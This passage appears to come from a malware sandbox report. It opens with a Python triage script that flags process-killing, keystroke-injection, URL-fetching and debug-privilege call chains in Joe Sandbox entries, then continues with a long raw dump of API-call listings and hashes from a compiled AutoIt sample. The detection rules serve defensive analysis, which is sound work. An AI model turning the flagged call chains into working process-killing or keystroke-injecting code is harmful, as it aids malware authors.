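        args = [_parse_arg(t) for t in raw.split(",")] if raw else []
        calls.append(Call(m.group("api"), m.group("module"), args, m.group("ref"), m.group("caller") or ""))
    return calls


def terminates_process(calls):
    """Refs of OpenProcess(PROCESS_TERMINATE, ...) and TerminateProcess when both occur."""
    opens = [c for c in calls if c.api == "OpenProcess" and c.args
             and c.args[0] is not None and c.args[0] & PROCESS_TERMINATE]
    kills = [c for c in calls if c.api == "TerminateProcess"]
    return [c.ref for c in opens + kills] if opens and kills else []


def injects_keystrokes(calls):
    """Refs of AttachThreadInput and of key-down/key-up messages aimed at a window, when both occur."""
    attach = [c for c in calls if c.api == "AttachThreadInput"]
    keys = [c for c in calls
            if c.api in ("PostMessageW", "PostMessageA", "SendMessageW", "SendMessageA")
            and len(c.args) >= 2 and c.args[1] in (WM_KEYDOWN, WM_KEYUP)]
    return [c.ref for c in attach + keys] if attach and keys else []


def fetches_url(calls):
    """Refs of WinINet calls that open a connection or a URL."""
    return [c.ref for c in calls if c.module == "WININET"
            and c.api.startswith(("InternetConnect", "InternetOpenUrl"))]


def triage(entry_text, strings=()):
    """Run all rules over one entry; `strings` is the entry's String ID list."""
    calls = parse_calls(entry_text)
    return {
        "calls": len(calls),
        "process_termination": terminates_process(calls),
        "keystroke_injection": injects_keystrokes(calls),
        "url_fetch": fetches_url(calls),
        # SeDebugPrivilege lets OpenProcess succeed on processes the caller does not own.
        "debug_privilege": "SeDebugPrivilege" in strings,
    }


# Sample input copied from this report's process-termination entry.
PROCESS_CLOSE_ENTRY = """\
• Part of subcall function 000DD4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 000DD501
• Part of subcall function 000DD4DC: Process32FirstW.KERNEL32(00000000,?), ref: 000DD50F
• Part of subcall function 000DD4DC: CloseHandle.KERNEL32(00000000), ref: 000DD5DC
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 000FA16D
• GetLastError.KERNEL32 ref: 000FA180
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 000FA1B3
• TerminateProcess.KERNEL32(00000000,00000000), ref: 000FA268
• GetLastError.KERNEL32(00000000), ref: 000FA273
• CloseHandle.KERNEL32(00000000), ref: 000FA2C4
"""

# Sample input copied (shortened) from this report's keystroke entry.
KEYSTROKE_ENTRY = """\
• Part of subcall function 000D3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 000D3A57
• Part of subcall function 000D3A3D: GetCurrentThreadId.KERNEL32 ref: 000D3A5E
• Part of subcall function 000D3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,000D25B3), ref: 000D3A65
• MapVirtualKeyW.USER32(00000025,00000000), ref: 000D25BD
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 000D25DB
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 000D2623
"""

if __name__ == "__main__":
    print("ProcessClose-like:", triage(PROCESS_CLOSE_ENTRY, ("SeDebugPrivilege",)))
    print("ControlSend-like: ", triage(KEYSTROKE_ENTRY))
```

Each rule returns the call-site refs as evidence rather than a verdict, because in a compiled AutoIt binary the same chains appear whether or not the script ever calls ProcessClose or ControlSend; the refs are what you take into the decompiler to check for actual cross-references from the script interpreter loop.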
                                        APIs
                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00103925
                                        • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0010393A
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00103954
                                        • _wcslen.LIBCMT ref: 00103999
                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 001039C6
                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 001039F4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window_wcslen
                                        • String ID: SysListView32
                                        • API String ID: 2147712094-78025650
                                        • Opcode ID: 312716f650bbd2c7face680dd8bc1f8b03d96e21a5d4b40e4572be2dc55bf254
                                        • Instruction ID: 98e07b7d48839c068f29b8c9dc166426c8a095294c06a3fc70fdafc3bb67df7a
                                        • Opcode Fuzzy Hash: 312716f650bbd2c7face680dd8bc1f8b03d96e21a5d4b40e4572be2dc55bf254
                                        • Instruction Fuzzy Hash: 5C419571A00219ABEF219F64CC49BEA77ADFF08354F100566F598E72D1D7B19980CB90
                                        APIs
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000DBCFD
                                        • IsMenu.USER32(00000000), ref: 000DBD1D
                                        • CreatePopupMenu.USER32 ref: 000DBD53
                                        • GetMenuItemCount.USER32(014257A8), ref: 000DBDA4
                                        • InsertMenuItemW.USER32(014257A8,?,00000001,00000030), ref: 000DBDCC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Menu$Item$CountCreateInfoInsertPopup
                                        • String ID: 0$2
                                        • API String ID: 93392585-3793063076
                                        • Opcode ID: 02361bba93111f60eb118e5a3805dd382db73b21edc9db90838cb1b7dc46a934
                                        • Instruction ID: 60af39b1439842722fb63f2a74362373d73e5436af351205f3a64fcbb009d60b
                                        • Opcode Fuzzy Hash: 02361bba93111f60eb118e5a3805dd382db73b21edc9db90838cb1b7dc46a934
                                        • Instruction Fuzzy Hash: C8518E70A00309DBDB20DFA8D884BAEBBF6BF49314F15425AE4519B391E7709945CB71
                                        APIs
                                        • _ValidateLocalCookies.LIBCMT ref: 00092D4B
                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00092D53
                                        • _ValidateLocalCookies.LIBCMT ref: 00092DE1
                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00092E0C
                                        • _ValidateLocalCookies.LIBCMT ref: 00092E61
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                        • String ID: &H$csm
                                        • API String ID: 1170836740-1834196660
                                        • Opcode ID: 972d7325c257450e38eb3beff5ee858aea3af525a5549b721499336f9d6b3514
                                        • Instruction ID: 2e483de005d49b528a72ac04d33658738bf4b754cffd1ac5fcb7152bfa9291e2
                                        • Opcode Fuzzy Hash: 972d7325c257450e38eb3beff5ee858aea3af525a5549b721499336f9d6b3514
                                        • Instruction Fuzzy Hash: C9419D34E02209ABCF14DF68C885ADEBBF5BF44324F148155F814AB392DB71AA45EBD0
                                        APIs
                                        • LoadIconW.USER32(00000000,00007F03), ref: 000DC913
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: IconLoad
                                        • String ID: blank$info$question$stop$warning
                                        • API String ID: 2457776203-404129466
                                        • Opcode ID: 539da8712ecf5a958f7b3cbfbb8705c2cde36f100d587fac7556cb709367ff40
                                        • Instruction ID: f0a33b655eac5d5fa7192ee63f15ef1da5ebfdb7bcf0aefadfa89e7661e04e7d
                                        • Opcode Fuzzy Hash: 539da8712ecf5a958f7b3cbfbb8705c2cde36f100d587fac7556cb709367ff40
                                        • Instruction Fuzzy Hash: 45110A32689307BAFB119B54DC93CEEB7DCDF15364B60402BF500A6382EBB05E41A275
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                        • String ID: 0.0.0.0
                                        • API String ID: 642191829-3771769585
                                        • Opcode ID: de03ab1a99ecadcbd98a767083c5024e51526c17699298e7f959fdf6fca11b08
                                        • Instruction ID: 38fbea092c8ec33363f813d9ee825b18bb97bcbf9d539e251128da143dac3201
                                        • Opcode Fuzzy Hash: de03ab1a99ecadcbd98a767083c5024e51526c17699298e7f959fdf6fca11b08
                                        • Instruction Fuzzy Hash: 8D110A31504205AFCB207B74DC0AEEF77ACDF11711F00016BF44596192EFB08A819FA0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _wcslen$LocalTime
                                        • String ID:
                                        • API String ID: 952045576-0
                                        • Opcode ID: 143fe7edb3fdda7ffb345908dfc8c7affd4c558b16564b87060669195365a8b7
                                        • Instruction ID: eec557a7d4c18ee27601a8b54b48ce226f22c869e81a18b8ec0651cf21d026d0
                                        • Opcode Fuzzy Hash: 143fe7edb3fdda7ffb345908dfc8c7affd4c558b16564b87060669195365a8b7
                                        • Instruction Fuzzy Hash: 59418C65C10218A6CF11FBB4C88AACFB7A8AF45710F508563E518E7262EB34E255C3A6
                                        APIs
                                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,000C682C,00000004,00000000,00000000), ref: 0008F953
                                        • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,000C682C,00000004,00000000,00000000), ref: 000CF3D1
                                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,000C682C,00000004,00000000,00000000), ref: 000CF454
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ShowWindow
                                        • String ID:
                                        • API String ID: 1268545403-0
                                        • Opcode ID: 17134f3d3bbb37feb52d2258493c494a79b04460172312b331b2d6ef11dbd311
                                        • Instruction ID: 2cc7a8105cdb248bdb6018c10efd65b5a5cd18fabca948d354309aca981d9831
                                        • Opcode Fuzzy Hash: 17134f3d3bbb37feb52d2258493c494a79b04460172312b331b2d6ef11dbd311
                                        • Instruction Fuzzy Hash: 2E413B30218682FAC779BB38C888B7E7BD2BB56314F14413CE0C792961C676A9C0CB52
                                        APIs
                                        • DeleteObject.GDI32(00000000), ref: 00102D1B
                                        • GetDC.USER32(00000000), ref: 00102D23
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00102D2E
                                        • ReleaseDC.USER32(00000000,00000000), ref: 00102D3A
                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00102D76
                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00102D87
                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00105A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00102DC2
                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00102DE1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                        • String ID:
                                        • API String ID: 3864802216-0
                                        • Opcode ID: 53c00044f4f781e7d6516d4bfc89b129f084dca5db5fdea4f1ffbc8a3dc9b7e6
                                        • Instruction ID: ab2979f9dcf0017645359d493b3bcd6010ec3a20eac93be8eb057a43be5fc05f
                                        • Opcode Fuzzy Hash: 53c00044f4f781e7d6516d4bfc89b129f084dca5db5fdea4f1ffbc8a3dc9b7e6
                                        • Instruction Fuzzy Hash: 96317A76201214BFEB218F50CC8AFEB3BADEF09715F044155FE889A2D1C6B59C91CBA4
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _memcmp
                                        • String ID:
                                        • API String ID: 2931989736-0
                                        • Opcode ID: de829d349ea442c208cf22d66c9e4307a7194b1f9626ccbd5e09037f954ad4df
                                        • Instruction ID: 34efdb9cbe5a68b25b155e91469bf05e60c95b9a05d9f0ec7fb4a8894bb75e44
                                        • Opcode Fuzzy Hash: de829d349ea442c208cf22d66c9e4307a7194b1f9626ccbd5e09037f954ad4df
                                        • Instruction Fuzzy Hash: 98218671744B09B7E62555109E83FFA33ACAF10396F544026FD045BB82F7A0EE1195B5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: NULL Pointer assignment$Not an Object type
                                        • API String ID: 0-572801152
                                        • Opcode ID: c1e230b850255567ad3b2fc066c82821ab279bb26c86004ca84242821d5a68db
                                        • Instruction ID: a1ef2c85f9ca96b1a9a772d318116f2747b81780bb1c97ac802106af21880d8c
                                        • Opcode Fuzzy Hash: c1e230b850255567ad3b2fc066c82821ab279bb26c86004ca84242821d5a68db
                                        • Instruction Fuzzy Hash: B1D18E71A0060AAFDB10CF98CC81BBEB7F5BF48345F148169EA15AB681E770E941DB90
                                        APIs
                                        • GetCPInfo.KERNEL32(?,?), ref: 000B15CE
                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 000B1651
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 000B16E4
                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 000B16FB
                                          • Part of subcall function 000A3820: RtlAllocateHeap.NTDLL(00000000,?,00141444,?,0008FDF5,?,?,0007A976,00000010,00141440,000713FC,?,000713C6,?,00071129), ref: 000A3852
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 000B1777
                                        • __freea.LIBCMT ref: 000B17A2
                                        • __freea.LIBCMT ref: 000B17AE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                        • String ID:
                                        • API String ID: 2829977744-0
                                        • Opcode ID: 07fe767eb4ca41ab5dbce1963f23f77ea7b37d3ccf97ea4f60db1abd72a29d57
                                        • Instruction ID: 923a65fd1c82486decdb93e5c2a084a02db35b07213c7a8c270c881b918fa117
                                        • Opcode Fuzzy Hash: 07fe767eb4ca41ab5dbce1963f23f77ea7b37d3ccf97ea4f60db1abd72a29d57
                                        • Instruction Fuzzy Hash: 1F91B471E146169ADF308FB4C8A1AEEBBF5EF49350F984669E801E7181DB35DD40CBA0
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Variant$ClearInit
                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                        • API String ID: 2610073882-625585964
                                        • Opcode ID: f362e4ed7a42139005fc4278991b90c1e2b33312bfb9869a06077dc8a8aefa84
                                        • Instruction ID: 80a09a42a6cadda2105ac47e57e1604f7cf8ce3a59bd8307dbdebcfc7dc8b2e5
                                        • Opcode Fuzzy Hash: f362e4ed7a42139005fc4278991b90c1e2b33312bfb9869a06077dc8a8aefa84
                                        • Instruction Fuzzy Hash: 68918E71A04219ABDF20DFA5C884FBFBBB8EF46710F108559FA05AB681D7709941DFA0
                                        APIs
                                        • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 000E125C
                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 000E1284
                                        • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 000E12A8
                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 000E12D8
                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 000E135F
                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 000E13C4
                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 000E1430
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ArraySafe$Data$Access$UnaccessVartype
                                        • String ID:
                                        • API String ID: 2550207440-0
                                        • Opcode ID: 0677c1455887da90b1e9bb1557c935cf3ccab57515b73e068ce5b98716d2aeaa
                                        • Instruction ID: aca3d757485218b0ea91c99874fe9e6e1ae4e649481fe81e7beed595d96ab5e6
                                        • Opcode Fuzzy Hash: 0677c1455887da90b1e9bb1557c935cf3ccab57515b73e068ce5b98716d2aeaa
                                        • Instruction Fuzzy Hash: 7991F3B1A00249AFDB00DFA9C884BFEB7B5FF45314F104029EA51FB292D775A941CB90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ObjectSelect$BeginCreatePath
                                        • String ID:
                                        • API String ID: 3225163088-0
                                        • Opcode ID: a1c58e3fbb28c29f63d239cf4c4fcb7fe26eccab4b43df597c0aa4c5cea5966a
                                        • Instruction ID: 1363f135c70306952df22168c84460a4dc84d98d87926effe97d426b3d96e07c
                                        • Opcode Fuzzy Hash: a1c58e3fbb28c29f63d239cf4c4fcb7fe26eccab4b43df597c0aa4c5cea5966a
                                        • Instruction Fuzzy Hash: A3911671D00219EFCB50EFA9C884AEEBBB8FF49320F184559E555B7251D374AA81CF60
                                        APIs
                                        • VariantInit.OLEAUT32(?), ref: 000F396B
                                        • CharUpperBuffW.USER32(?,?), ref: 000F3A7A
                                        • _wcslen.LIBCMT ref: 000F3A8A
                                        • VariantClear.OLEAUT32(?), ref: 000F3C1F
                                          • Part of subcall function 000E0CDF: VariantInit.OLEAUT32(00000000), ref: 000E0D1F
                                          • Part of subcall function 000E0CDF: VariantCopy.OLEAUT32(?,?), ref: 000E0D28
                                          • Part of subcall function 000E0CDF: VariantClear.OLEAUT32(?), ref: 000E0D34
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                        • API String ID: 4137639002-1221869570
                                        • Opcode ID: 018c0edc69655cf7095b390f5fd2adbf13453e434817c87bf059aaeb5a5d8d26
                                        • Instruction ID: 1ebef709290058be599af20286b5392cfa0c7df6f0318b640e9ae377ef7cccb3
                                        • Opcode Fuzzy Hash: 018c0edc69655cf7095b390f5fd2adbf13453e434817c87bf059aaeb5a5d8d26
                                        • Instruction Fuzzy Hash: 57918974A083099FC714EF24C48196AB7E4FF89324F14892DF9899B352DB31EE45DB92
                                        APIs
                                          • Part of subcall function 000D000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,000CFF41,80070057,?,?,?,000D035E), ref: 000D002B
                                          • Part of subcall function 000D000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,000CFF41,80070057,?,?), ref: 000D0046
                                          • Part of subcall function 000D000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,000CFF41,80070057,?,?), ref: 000D0054
                                          • Part of subcall function 000D000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,000CFF41,80070057,?), ref: 000D0064
                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 000F4C51
                                        • _wcslen.LIBCMT ref: 000F4D59
                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 000F4DCF
                                        • CoTaskMemFree.OLE32(?), ref: 000F4DDA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                         • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmp
